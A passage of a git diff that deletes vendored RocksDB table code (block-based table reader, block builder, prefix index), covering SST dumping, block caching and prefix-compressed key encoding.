-    out_file->Append(ikey.user_key().ToString(true).c_str());
-    out_file->Append(": ");
-    out_file->Append(blockhandles_iter->value().ToString(true).c_str());
-    out_file->Append("\n");
-
-    std::string str_key = ikey.user_key().ToString();
-    std::string res_key("");
-    char cspace = ' ';
-    for (size_t i = 0; i < str_key.size(); i++) {
-      res_key.append(&str_key[i], 1);
-      res_key.append(1, cspace);
-    }
-    out_file->Append("  ASCII  ");
-    out_file->Append(res_key.c_str());
-    out_file->Append("\n  ------\n");
-  }
-  out_file->Append("\n");
-  return Status::OK();
-}
-
-Status BlockBasedTable::DumpDataBlocks(WritableFile* out_file) {
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    out_file->Append("Can not read Index Block \n\n");
-    return s;
-  }
-
-  uint64_t datablock_size_min = std::numeric_limits<uint64_t>::max();
-  uint64_t datablock_size_max = 0;
-  uint64_t datablock_size_sum = 0;
-
-  size_t block_id = 1;
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       block_id++, blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-
-    Slice bh_val = blockhandles_iter->value();
-    BlockHandle bh;
-    bh.DecodeFrom(&bh_val);
-    uint64_t datablock_size = bh.size();
-    datablock_size_min = std::min(datablock_size_min, datablock_size);
-    datablock_size_max = std::max(datablock_size_max, datablock_size);
-    datablock_size_sum += datablock_size;
-
-    out_file->Append("Data Block # ");
-    out_file->Append(rocksdb::ToString(block_id));
-    out_file->Append(" @ ");
-    out_file->Append(blockhandles_iter->value().ToString(true).c_str());
-    out_file->Append("\n");
-    out_file->Append("--------------------------------------\n");
-
-    std::unique_ptr<InternalIterator> datablock_iter;
-    datablock_iter.reset(
-        NewDataBlockIterator(rep_, ReadOptions(), blockhandles_iter->value()));
-    s = datablock_iter->status();
-
-    if (!s.ok()) {
-      out_file->Append("Error reading the block - Skipped \n\n");
-      continue;
-    }
-
-    for (datablock_iter->SeekToFirst(); datablock_iter->Valid();
-         datablock_iter->Next()) {
-      s = datablock_iter->status();
-      if (!s.ok()) {
-        out_file->Append("Error reading the block - Skipped \n");
-        break;
-      }
-      DumpKeyValue(datablock_iter->key(), datablock_iter->value(), out_file);
-    }
-    out_file->Append("\n");
-  }
-
-  uint64_t num_datablocks = block_id - 1;
-  if (num_datablocks) {
-    double datablock_size_avg =
-        static_cast<double>(datablock_size_sum) / num_datablocks;
-    out_file->Append("Data Block Summary:\n");
-    out_file->Append("--------------------------------------");
-    out_file->Append("\n  # data blocks: ");
-    out_file->Append(rocksdb::ToString(num_datablocks));
-    out_file->Append("\n  min data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_min));
-    out_file->Append("\n  max data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_max));
-    out_file->Append("\n  avg data block size: ");
-    out_file->Append(rocksdb::ToString(datablock_size_avg));
-    out_file->Append("\n");
-  }
-
-  return Status::OK();
-}
-
-void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value,
-                                   WritableFile* out_file) {
-  InternalKey ikey;
-  ikey.DecodeFrom(key);
-
-  out_file->Append("  HEX    ");
-  out_file->Append(ikey.user_key().ToString(true).c_str());
-  out_file->Append(": ");
-  out_file->Append(value.ToString(true).c_str());
-  out_file->Append("\n");
-
-  std::string str_key = ikey.user_key().ToString();
-  std::string str_value = value.ToString();
-  std::string res_key(""), res_value("");
-  char cspace = ' ';
-  for (size_t i = 0; i < str_key.size(); i++) {
-    res_key.append(&str_key[i], 1);
-    res_key.append(1, cspace);
-  }
-  for (size_t i = 0; i < str_value.size(); i++) {
-    res_value.append(&str_value[i], 1);
-    res_value.append(1, cspace);
-  }
-
-  out_file->Append("  ASCII  ");
-  out_file->Append(res_key.c_str());
-  out_file->Append(": ");
-  out_file->Append(res_value.c_str());
-  out_file->Append("\n  ------\n");
-}
-
-namespace {
-
-void DeleteCachedFilterEntry(const Slice& key, void* value) {
-  FilterBlockReader* filter = reinterpret_cast<FilterBlockReader*>(value);
-  if (filter->statistics() != nullptr) {
-    RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT,
-               filter->size());
-  }
-  delete filter;
-}
-
-void DeleteCachedIndexEntry(const Slice& key, void* value) {
-  IndexReader* index_reader = reinterpret_cast<IndexReader*>(value);
-  if (index_reader->statistics() != nullptr) {
-    RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT,
-               index_reader->usable_size());
-  }
-  delete index_reader;
-}
-
-}  // anonymous namespace
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_reader.h b/thirdparty/rocksdb/table/block_based_table_reader.h
deleted file mode 100644
index a5426cd..0000000
--- a/thirdparty/rocksdb/table/block_based_table_reader.h
+++ /dev/null
@@ -1,486 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/persistent_cache_helper.h"
-#include "table/table_properties_internal.h"
-#include "table/table_reader.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-class BlockIter;
-class BlockHandle;
-class Cache;
-class FilterBlockReader;
-class BlockBasedFilterBlockReader;
-class FullFilterBlockReader;
-class Footer;
-class InternalKeyComparator;
-class Iterator;
-class RandomAccessFile;
-class TableCache;
-class TableReader;
-class WritableFile;
-struct BlockBasedTableOptions;
-struct EnvOptions;
-struct ReadOptions;
-class GetContext;
-class InternalIterator;
-
-using std::unique_ptr;
-
-typedef std::vector<std::pair<std::string, std::string>> KVPairBlock;
-
-// A Table is a sorted map from strings to strings.  Tables are
-// immutable and persistent.  A Table may be safely accessed from
-// multiple threads without external synchronization.
-class BlockBasedTable : public TableReader {
- public:
-  static const std::string kFilterBlockPrefix;
-  static const std::string kFullFilterBlockPrefix;
-  static const std::string kPartitionedFilterBlockPrefix;
-  // The longest prefix of the cache key used to identify blocks.
-  // For Posix files the unique ID is three varints.
-  static const size_t kMaxCacheKeyPrefixSize = kMaxVarint64Length * 3 + 1;
-
-  // Attempt to open the table that is stored in bytes [0..file_size)
-  // of "file", and read the metadata entries necessary to allow
-  // retrieving data from the table.
-  //
-  // If successful, returns ok and sets "*table_reader" to the newly opened
-  // table.  The client should delete "*table_reader" when no longer needed.
-  // If there was an error while initializing the table, sets "*table_reader"
-  // to nullptr and returns a non-ok status.
-  //
-  // @param file must remain live while this Table is in use.
-  // @param prefetch_index_and_filter_in_cache can be used to disable
-  // prefetching of
-  //    index and filter blocks into block cache at startup
-  // @param skip_filters Disables loading/accessing the filter block. Overrides
-  //    prefetch_index_and_filter_in_cache, so filter will be skipped if both
-  //    are set.
-  static Status Open(const ImmutableCFOptions& ioptions,
-                     const EnvOptions& env_options,
-                     const BlockBasedTableOptions& table_options,
-                     const InternalKeyComparator& internal_key_comparator,
-                     unique_ptr<RandomAccessFileReader>&& file,
-                     uint64_t file_size, unique_ptr<TableReader>* table_reader,
-                     bool prefetch_index_and_filter_in_cache = true,
-                     bool skip_filters = false, int level = -1);
-
-  bool PrefixMayMatch(const Slice& internal_key);
-
-  // Returns a new iterator over the table contents.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  // @param skip_filters Disables loading/accessing the filter block
-  InternalIterator* NewIterator(
-      const ReadOptions&, Arena* arena = nullptr,
-      bool skip_filters = false) override;
-
-  InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& read_options) override;
-
-  // @param skip_filters Disables loading/accessing the filter block
-  Status Get(const ReadOptions& readOptions, const Slice& key,
-             GetContext* get_context, bool skip_filters = false) override;
-
-  // Pre-fetch the disk blocks that correspond to the key range specified by
-  // (kbegin, kend). The call will return error status in the event of
-  // IO or iteration error.
-  Status Prefetch(const Slice* begin, const Slice* end) override;
-
-  // Given a key, return an approximate byte offset in the file where
-  // the data for that key begins (or would begin if the key were
-  // present in the file).  The returned value is in terms of file
-  // bytes, and so includes effects like compression of the underlying data.
-  // E.g., the approximate offset of the last key in the table will
-  // be close to the file length.
-  uint64_t ApproximateOffsetOf(const Slice& key) override;
-
-  // Returns true if the block for the specified key is in cache.
-  // REQUIRES: key is in this table && block cache enabled
-  bool TEST_KeyInCache(const ReadOptions& options, const Slice& key);
-
-  // Set up the table for Compaction. Might change some parameters with
-  // posix_fadvise
-  void SetupForCompaction() override;
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override;
-
-  size_t ApproximateMemoryUsage() const override;
-
-  // convert SST file to a human readable form
-  Status DumpTable(WritableFile* out_file) override;
-
-  Status VerifyChecksum() override;
-
-  void Close() override;
-
-  ~BlockBasedTable();
-
-  bool TEST_filter_block_preloaded() const;
-  bool TEST_index_reader_preloaded() const;
-
-  // IndexReader is the interface that provide the functionality for index
-  // access.
-  class IndexReader {
-   public:
-    explicit IndexReader(const InternalKeyComparator* icomparator,
-                         Statistics* stats)
-        : icomparator_(icomparator), statistics_(stats) {}
-
-    virtual ~IndexReader() {}
-
-    // Create an iterator for index access.
-    // If iter is null then a new object is created on heap and the callee will
-    // have the ownership. If a non-null iter is passed in it will be used, and
-    // the returned value is either the same as iter or a new on-heap object
-    // that
-    // wrapps the passed iter. In the latter case the return value would point
-    // to
-    // a different object then iter and the callee has the ownership of the
-    // returned object.
-    virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                          bool total_order_seek = true) = 0;
-
-    // The size of the index.
-    virtual size_t size() const = 0;
-    // Memory usage of the index block
-    virtual size_t usable_size() const = 0;
-    // return the statistics pointer
-    virtual Statistics* statistics() const { return statistics_; }
-    // Report an approximation of how much memory has been used other than
-    // memory
-    // that was allocated in block cache.
-    virtual size_t ApproximateMemoryUsage() const = 0;
-
-    virtual void CacheDependencies(bool /* unused */) {}
-
-    // Prefetch all the blocks referenced by this index to the buffer
-    void PrefetchBlocks(FilePrefetchBuffer* buf);
-
-   protected:
-    const InternalKeyComparator* icomparator_;
-
-   private:
-    Statistics* statistics_;
-  };
-
-  static Slice GetCacheKey(const char* cache_key_prefix,
-                           size_t cache_key_prefix_size,
-                           const BlockHandle& handle, char* cache_key);
-
-  // Retrieve all key value pairs from data blocks in the table.
-  // The key retrieved are internal keys.
-  Status GetKVPairsFromDataBlocks(std::vector<KVPairBlock>* kv_pair_blocks);
-
-  class BlockEntryIteratorState;
-
-  friend class PartitionIndexReader;
-
- protected:
-  template <class TValue>
-  struct CachableEntry;
-  struct Rep;
-  Rep* rep_;
-  explicit BlockBasedTable(Rep* rep) : rep_(rep) {}
-
- private:
-  friend class MockedBlockBasedTable;
-  // input_iter: if it is not null, update this one and return it as Iterator
-  static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro,
-                                                const Slice& index_value,
-                                                BlockIter* input_iter = nullptr,
-                                                bool is_index = false);
-  static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro,
-                                                const BlockHandle& block_hanlde,
-                                                BlockIter* input_iter = nullptr,
-                                                bool is_index = false,
-                                                Status s = Status());
-  // If block cache enabled (compressed or uncompressed), looks for the block
-  // identified by handle in (1) uncompressed cache, (2) compressed cache, and
-  // then (3) file. If found, inserts into the cache(s) that were searched
-  // unsuccessfully (e.g., if found in file, will add to both uncompressed and
-  // compressed caches if they're enabled).
-  //
-  // @param block_entry value is set to the uncompressed block if found. If
-  //    in uncompressed block cache, also sets cache_handle to reference that
-  //    block.
-  static Status MaybeLoadDataBlockToCache(FilePrefetchBuffer* prefetch_buffer,
-                                          Rep* rep, const ReadOptions& ro,
-                                          const BlockHandle& handle,
-                                          Slice compression_dict,
-                                          CachableEntry<Block>* block_entry,
-                                          bool is_index = false);
-
-  // For the following two functions:
-  // if `no_io == true`, we will not try to read filter/index from sst file
-  // were they not present in cache yet.
-  CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer* prefetch_buffer = nullptr, bool no_io = false) const;
-  virtual CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle,
-      const bool is_a_filter_partition, bool no_io) const;
-
-  // Get the iterator from the index reader.
-  // If input_iter is not set, return new Iterator
-  // If input_iter is set, update it and return it as Iterator
-  //
-  // Note: ErrorIterator with Status::Incomplete shall be returned if all the
-  // following conditions are met:
-  //  1. We enabled table_options.cache_index_and_filter_blocks.
-  //  2. index is not present in block cache.
-  //  3. We disallowed any io to be performed, that is, read_options ==
-  //     kBlockCacheTier
-  InternalIterator* NewIndexIterator(
-      const ReadOptions& read_options, BlockIter* input_iter = nullptr,
-      CachableEntry<IndexReader>* index_entry = nullptr);
-
-  // Read block cache from block caches (if set): block_cache and
-  // block_cache_compressed.
-  // On success, Status::OK with be returned and @block will be populated with
-  // pointer to the block as well as its block handle.
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary.
-  static Status GetDataBlockFromCache(
-      const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-      Cache* block_cache, Cache* block_cache_compressed,
-      const ImmutableCFOptions& ioptions, const ReadOptions& read_options,
-      BlockBasedTable::CachableEntry<Block>* block, uint32_t format_version,
-      const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-      bool is_index = false);
-
-  // Put a raw block (maybe compressed) to the corresponding block caches.
-  // This method will perform decompression against raw_block if needed and then
-  // populate the block caches.
-  // On success, Status::OK will be returned; also @block will be populated with
-  // uncompressed block and its cache handle.
-  //
-  // REQUIRES: raw_block is heap-allocated. PutDataBlockToCache() will be
-  // responsible for releasing its memory if error occurs.
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary.
-  static Status PutDataBlockToCache(
-      const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-      Cache* block_cache, Cache* block_cache_compressed,
-      const ReadOptions& read_options, const ImmutableCFOptions& ioptions,
-      CachableEntry<Block>* block, Block* raw_block, uint32_t format_version,
-      const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-      bool is_index = false, Cache::Priority pri = Cache::Priority::LOW);
-
-  // Calls (*handle_result)(arg, ...) repeatedly, starting with the entry found
-  // after a call to Seek(key), until handle_result returns false.
-  // May not make such a call if filter policy says that key is not present.
-  friend class TableCache;
-  friend class BlockBasedTableBuilder;
-
-  void ReadMeta(const Footer& footer);
-
-  // Create a index reader based on the index type stored in the table.
-  // Optionally, user can pass a preloaded meta_index_iter for the index that
-  // need to access extra meta blocks for index construction. This parameter
-  // helps avoid re-reading meta index block if caller already created one.
-  Status CreateIndexReader(
-      FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader,
-      InternalIterator* preloaded_meta_index_iter = nullptr,
-      const int level = -1);
-
-  bool FullFilterKeyMayMatch(const ReadOptions& read_options,
-                             FilterBlockReader* filter, const Slice& user_key,
-                             const bool no_io) const;
-
-  // Read the meta block from sst.
-  static Status ReadMetaBlock(Rep* rep, FilePrefetchBuffer* prefetch_buffer,
-                              std::unique_ptr<Block>* meta_block,
-                              std::unique_ptr<InternalIterator>* iter);
-
-  Status VerifyChecksumInBlocks(InternalIterator* index_iter);
-
-  // Create the filter from the filter block.
-  FilterBlockReader* ReadFilter(FilePrefetchBuffer* prefetch_buffer,
-                                const BlockHandle& filter_handle,
-                                const bool is_a_filter_partition) const;
-
-  static void SetupCacheKeyPrefix(Rep* rep, uint64_t file_size);
-
-  // Generate a cache key prefix from the file
-  static void GenerateCachePrefix(Cache* cc,
-    RandomAccessFile* file, char* buffer, size_t* size);
-  static void GenerateCachePrefix(Cache* cc,
-    WritableFile* file, char* buffer, size_t* size);
-
-  // Helper functions for DumpTable()
-  Status DumpIndexBlock(WritableFile* out_file);
-  Status DumpDataBlocks(WritableFile* out_file);
-  void DumpKeyValue(const Slice& key, const Slice& value,
-                    WritableFile* out_file);
-
-  // No copying allowed
-  explicit BlockBasedTable(const TableReader&) = delete;
-  void operator=(const TableReader&) = delete;
-
-  friend class PartitionedFilterBlockReader;
-  friend class PartitionedFilterBlockTest;
-};
-
-// Maitaning state of a two-level iteration on a partitioned index structure
-class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState {
- public:
-  BlockEntryIteratorState(
-      BlockBasedTable* table, const ReadOptions& read_options,
-      const InternalKeyComparator* icomparator, bool skip_filters,
-      bool is_index = false,
-      std::unordered_map<uint64_t, CachableEntry<Block>>* block_map = nullptr);
-  InternalIterator* NewSecondaryIterator(const Slice& index_value) override;
-  bool PrefixMayMatch(const Slice& internal_key) override;
-  bool KeyReachedUpperBound(const Slice& internal_key) override;
-
- private:
-  // Don't own table_
-  BlockBasedTable* table_;
-  const ReadOptions read_options_;
-  const InternalKeyComparator* icomparator_;
-  bool skip_filters_;
-  // true if the 2nd level iterator is on indexes instead of on user data.
-  bool is_index_;
-  std::unordered_map<uint64_t, CachableEntry<Block>>* block_map_;
-  port::RWMutex cleaner_mu;
-};
-
-// CachableEntry represents the entries that *may* be fetched from block cache.
-//  field `value` is the item we want to get.
-//  field `cache_handle` is the cache handle to the block cache. If the value
-//    was not read from cache, `cache_handle` will be nullptr.
-template <class TValue>
-struct BlockBasedTable::CachableEntry {
-  CachableEntry(TValue* _value, Cache::Handle* _cache_handle)
-      : value(_value), cache_handle(_cache_handle) {}
-  CachableEntry() : CachableEntry(nullptr, nullptr) {}
-  void Release(Cache* cache, bool force_erase = false) {
-    if (cache_handle) {
-      cache->Release(cache_handle, force_erase);
-      value = nullptr;
-      cache_handle = nullptr;
-    }
-  }
-  bool IsSet() const { return cache_handle != nullptr; }
-
-  TValue* value = nullptr;
-  // if the entry is from the cache, cache_handle will be populated.
-  Cache::Handle* cache_handle = nullptr;
-};
-
-struct BlockBasedTable::Rep {
-  Rep(const ImmutableCFOptions& _ioptions, const EnvOptions& _env_options,
-      const BlockBasedTableOptions& _table_opt,
-      const InternalKeyComparator& _internal_comparator, bool skip_filters)
-      : ioptions(_ioptions),
-        env_options(_env_options),
-        table_options(_table_opt),
-        filter_policy(skip_filters ? nullptr : _table_opt.filter_policy.get()),
-        internal_comparator(_internal_comparator),
-        filter_type(FilterType::kNoFilter),
-        whole_key_filtering(_table_opt.whole_key_filtering),
-        prefix_filtering(true),
-        range_del_handle(BlockHandle::NullBlockHandle()),
-        global_seqno(kDisableGlobalSequenceNumber) {}
-
-  const ImmutableCFOptions& ioptions;
-  const EnvOptions& env_options;
-  const BlockBasedTableOptions& table_options;
-  const FilterPolicy* const filter_policy;
-  const InternalKeyComparator& internal_comparator;
-  Status status;
-  unique_ptr<RandomAccessFileReader> file;
-  char cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t cache_key_prefix_size = 0;
-  char persistent_cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t persistent_cache_key_prefix_size = 0;
-  char compressed_cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t compressed_cache_key_prefix_size = 0;
-  uint64_t dummy_index_reader_offset =
-      0;  // ID that is unique for the block cache.
-  PersistentCacheOptions persistent_cache_options;
-
-  // Footer contains the fixed table information
-  Footer footer;
-  // index_reader and filter will be populated and used only when
-  // options.block_cache is nullptr; otherwise we will get the index block via
-  // the block cache.
-  unique_ptr<IndexReader> index_reader;
-  unique_ptr<FilterBlockReader> filter;
-
-  enum class FilterType {
-    kNoFilter,
-    kFullFilter,
-    kBlockFilter,
-    kPartitionedFilter,
-  };
-  FilterType filter_type;
-  BlockHandle filter_handle;
-
-  std::shared_ptr<const TableProperties> table_properties;
-  // Block containing the data for the compression dictionary. We take ownership
-  // for the entire block struct, even though we only use its Slice member. This
-  // is easier because the Slice member depends on the continued existence of
-  // another member ("allocation").
-  std::unique_ptr<const BlockContents> compression_dict_block;
-  BlockBasedTableOptions::IndexType index_type;
-  bool hash_index_allow_collision;
-  bool whole_key_filtering;
-  bool prefix_filtering;
-  // TODO(kailiu) It is very ugly to use internal key in table, since table
-  // module should not be relying on db module. However to make things easier
-  // and compatible with existing code, we introduce a wrapper that allows
-  // block to extract prefix without knowing if a key is internal or not.
-  unique_ptr<SliceTransform> internal_prefix_transform;
-
-  // only used in level 0 files:
-  // when pin_l0_filter_and_index_blocks_in_cache is true, we do use the
-  // LRU cache, but we always keep the filter & idndex block's handle checked
-  // out here (=we don't call Release()), plus the parsed out objects
-  // the LRU cache will never push flush them out, hence they're pinned
-  CachableEntry<FilterBlockReader> filter_entry;
-  CachableEntry<IndexReader> index_entry;
-  // range deletion meta-block is pinned through reader's lifetime when LRU
-  // cache is enabled.
-  CachableEntry<Block> range_del_entry;
-  BlockHandle range_del_handle;
-
-  // If global_seqno is used, all Keys in this file will have the same
-  // seqno with value `global_seqno`.
-  //
-  // A value of kDisableGlobalSequenceNumber means that this feature is disabled
-  // and every key have it's own seqno.
-  SequenceNumber global_seqno;
-  bool closed = false;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_builder.cc b/thirdparty/rocksdb/table/block_builder.cc
deleted file mode 100644
index 39bfffe..0000000
--- a/thirdparty/rocksdb/table/block_builder.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// BlockBuilder generates blocks where keys are prefix-compressed:
-//
-// When we store a key, we drop the prefix shared with the previous
-// string.  This helps reduce the space requirement significantly.
-// Furthermore, once every K keys, we do not apply the prefix
-// compression and store the entire key.  We call this a "restart
-// point".  The tail end of the block stores the offsets of all of the
-// restart points, and can be used to do a binary search when looking
-// for a particular key.  Values are stored as-is (without compression)
-// immediately following the corresponding key.
-//
-// An entry for a particular key-value pair has the form:
-//     shared_bytes: varint32
-//     unshared_bytes: varint32
-//     value_length: varint32
-//     key_delta: char[unshared_bytes]
-//     value: char[value_length]
-// shared_bytes == 0 for restart points.
-//
-// The trailer of the block has the form:
-//     restarts: uint32[num_restarts]
-//     num_restarts: uint32
-// restarts[i] contains the offset within the block of the ith restart point.
-
-#include "table/block_builder.h"
-
-#include <algorithm>
-#include <assert.h>
-#include "rocksdb/comparator.h"
-#include "db/dbformat.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-BlockBuilder::BlockBuilder(int block_restart_interval, bool use_delta_encoding)
-    : block_restart_interval_(block_restart_interval),
-      use_delta_encoding_(use_delta_encoding),
-      restarts_(),
-      counter_(0),
-      finished_(false) {
-  assert(block_restart_interval_ >= 1);
-  restarts_.push_back(0);       // First restart point is at offset 0
-  estimate_ = sizeof(uint32_t) + sizeof(uint32_t);
-}
-
-void BlockBuilder::Reset() {
-  buffer_.clear();
-  restarts_.clear();
-  restarts_.push_back(0);       // First restart point is at offset 0
-  estimate_ = sizeof(uint32_t) + sizeof(uint32_t);
-  counter_ = 0;
-  finished_ = false;
-  last_key_.clear();
-}
-
-size_t BlockBuilder::EstimateSizeAfterKV(const Slice& key, const Slice& value)
-  const {
-  size_t estimate = CurrentSizeEstimate();
-  estimate += key.size() + value.size();
-  if (counter_ >= block_restart_interval_) {
-    estimate += sizeof(uint32_t); // a new restart entry.
-  }
-
-  estimate += sizeof(int32_t); // varint for shared prefix length.
-  estimate += VarintLength(key.size()); // varint for key length.
-  estimate += VarintLength(value.size()); // varint for value length.
-
-  return estimate;
-}
-
-Slice BlockBuilder::Finish() {
-  // Append restart array
-  for (size_t i = 0; i < restarts_.size(); i++) {
-    PutFixed32(&buffer_, restarts_[i]);
-  }
-  PutFixed32(&buffer_, static_cast<uint32_t>(restarts_.size()));
-  finished_ = true;
-  return Slice(buffer_);
-}
-
-void BlockBuilder::Add(const Slice& key, const Slice& value) {
-  assert(!finished_);
-  assert(counter_ <= block_restart_interval_);
-  size_t shared = 0;  // number of bytes shared with prev key
-  if (counter_ >= block_restart_interval_) {
-    // Restart compression
-    restarts_.push_back(static_cast<uint32_t>(buffer_.size()));
-    estimate_ += sizeof(uint32_t);
-    counter_ = 0;
-
-    if (use_delta_encoding_) {
-      // Update state
-      last_key_.assign(key.data(), key.size());
-    }
-  } else if (use_delta_encoding_) {
-    Slice last_key_piece(last_key_);
-    // See how much sharing to do with previous string
-    shared = key.difference_offset(last_key_piece);
-
-    // Update state
-    // We used to just copy the changed data here, but it appears to be
-    // faster to just copy the whole thing.
-    last_key_.assign(key.data(), key.size());
-  }
-
-  const size_t non_shared = key.size() - shared;
-  const size_t curr_size = buffer_.size();
-
-  // Add "<shared><non_shared><value_size>" to buffer_
-  PutVarint32Varint32Varint32(&buffer_, static_cast<uint32_t>(shared),
-                              static_cast<uint32_t>(non_shared),
-                              static_cast<uint32_t>(value.size()));
-
-  // Add string delta to buffer_ followed by value
-  buffer_.append(key.data() + shared, non_shared);
-  buffer_.append(value.data(), value.size());
-
-  counter_++;
-  estimate_ += buffer_.size() - curr_size;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_builder.h b/thirdparty/rocksdb/table/block_builder.h
deleted file mode 100644
index 6b5297d..0000000
--- a/thirdparty/rocksdb/table/block_builder.h
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-
-#include <stdint.h>
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class BlockBuilder {
- public:
-  BlockBuilder(const BlockBuilder&) = delete;
-  void operator=(const BlockBuilder&) = delete;
-
-  explicit BlockBuilder(int block_restart_interval,
-                        bool use_delta_encoding = true);
-
-  // Reset the contents as if the BlockBuilder was just constructed.
-  void Reset();
-
-  // REQUIRES: Finish() has not been called since the last call to Reset().
-  // REQUIRES: key is larger than any previously added key
-  void Add(const Slice& key, const Slice& value);
-
-  // Finish building the block and return a slice that refers to the
-  // block contents.  The returned slice will remain valid for the
-  // lifetime of this builder or until Reset() is called.
-  Slice Finish();
-
-  // Returns an estimate of the current (uncompressed) size of the block
-  // we are building.
-  inline size_t CurrentSizeEstimate() const { return estimate_; }
-
-  // Returns an estimated block size after appending key and value.
-  size_t EstimateSizeAfterKV(const Slice& key, const Slice& value) const;
-
-  // Return true iff no entries have been added since the last Reset()
-  bool empty() const {
-    return buffer_.empty();
-  }
-
- private:
-  const int          block_restart_interval_;
-  const bool         use_delta_encoding_;
-
-  std::string           buffer_;    // Destination buffer
-  std::vector<uint32_t> restarts_;  // Restart points
-  size_t                estimate_;
-  int                   counter_;   // Number of entries emitted since restart
-  bool                  finished_;  // Has Finish() been called?
-  std::string           last_key_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_prefix_index.cc b/thirdparty/rocksdb/table/block_prefix_index.cc
deleted file mode 100644
index df37b5f..0000000
--- a/thirdparty/rocksdb/table/block_prefix_index.cc
+++ /dev/null
@@ -1,237 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/block_prefix_index.h"
-
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-inline uint32_t Hash(const Slice& s) {
-  return rocksdb::Hash(s.data(), s.size(), 0);
-}
-
-inline uint32_t PrefixToBucket(const Slice& prefix, uint32_t num_buckets) {
-  return Hash(prefix) % num_buckets;
-}
-
-// The prefix block index is simply a bucket array, with each entry pointing to
-// the blocks that span the prefixes hashed to this bucket.
-//
-// To reduce memory footprint, if there is only one block per bucket, the entry
-// stores the block id directly. If there are more than one blocks per bucket,
-// because of hash collision or a single prefix spanning multiple blocks,
-// the entry points to an array of block ids. The block array is an array of
-// uint32_t's. The first uint32_t indicates the total number of blocks, followed
-// by the block ids.
-//
-// To differentiate the two cases, the high order bit of the entry indicates
-// whether it is a 'pointer' into a separate block array.
-// 0x7FFFFFFF is reserved for empty bucket.
-
-const uint32_t kNoneBlock = 0x7FFFFFFF;
-const uint32_t kBlockArrayMask = 0x80000000;
-
-inline bool IsNone(uint32_t block_id) {
-  return block_id == kNoneBlock;
-}
-
-inline bool IsBlockId(uint32_t block_id) {
-  return (block_id & kBlockArrayMask) == 0;
-}
-
-inline uint32_t DecodeIndex(uint32_t block_id) {
-  uint32_t index = block_id ^ kBlockArrayMask;
-  assert(index < kBlockArrayMask);
-  return index;
-}
-
